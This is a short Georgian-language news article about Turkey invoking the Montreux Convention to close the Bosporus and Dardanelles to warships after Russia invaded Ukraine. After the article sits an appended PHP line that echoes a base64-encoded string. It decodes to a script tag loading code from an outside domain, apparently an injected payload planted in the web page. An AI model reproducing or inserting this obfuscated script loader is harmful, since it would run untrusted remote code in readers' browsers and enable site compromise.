celsiusi
ავერსი საქკაბელი
თურქეთის საგარეო საქმეთა მინისტრ მევლუთ ჩავუშოღლუს  თქმით, თურქეთი აამოქმედებს 1936 წლის მონტრეს კონვენციის მე-19 მუხლს, რის საფუძველზეც შავ ზღვაში არ შეუშვებს სამხედრო გემებს.
 
როგორც ჩავუშოღლუმ თურქულ ტელეარხ  CNN Turk-თან ინტერვიუში ისაუბრა, „ექსპერტებთან, სამხედროებთან და იურისტებთან“ კონსულტაციის გადაწყდა, რომ რუსეთი უკრაინაში აწარმოებს არა „სამხედრო ოპერაციას“, არამედ ომს. შესაბამისად, არსებული საომარი მდგომარეობა თურქეთს აძლევს საშუალებას, შეზღუდოს ნებისმიერი სამხედრო გემის გადაადგილება ბოსფორისა და დარდანელის სრუტეებში. ეს არის ერთადერთი გზა შავ ზღვაში საზღვაო გზით მოსახვედრად.
 
თუმცა როგორც The Wall Street Journal წერს, თურქეთისთვის ეს უფრო საერთაშორისო იმიჯისთვის მნიშვნელოვანი გადაწყვეტილებაა, რადგან რუსეთმა ბოლო თვეებში, ჯერ კიდევ უკრაინაში ომის დაწყებამდე, მნიშვნელოვან სამხედრო ძალას, მათ შორის, წყალქვეშა გემებს მოუყარა თავი შავ ზღვაში. მონტრეს კონვენცია კი შეზღუდავს რეგიონში დამატებითი გემების შესვლას, თუმცა ვერ აიძულებს რუსეთს, უკან გაიყვანოს უკვე მობილიზებული სამხედრო ძალა.
 
დარდანელისა და ბოსფორის სრუტეების რუსული სამხედრო გემებისთვის ჩაკეტვა ნატოს წევრ თურქეთს უკრაინამ სთხოვა, რასაც თავდაპირველად თურქეთმა უარით უპასუხა, მაგრამ ბოლო დღეებში ვითარება შეიცვალა.
 
რუსეთი უკრაინაში 24 თებერვალს შეიჭრა და მას შემდეგ განუწყვეტლივ უტევს.
821
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");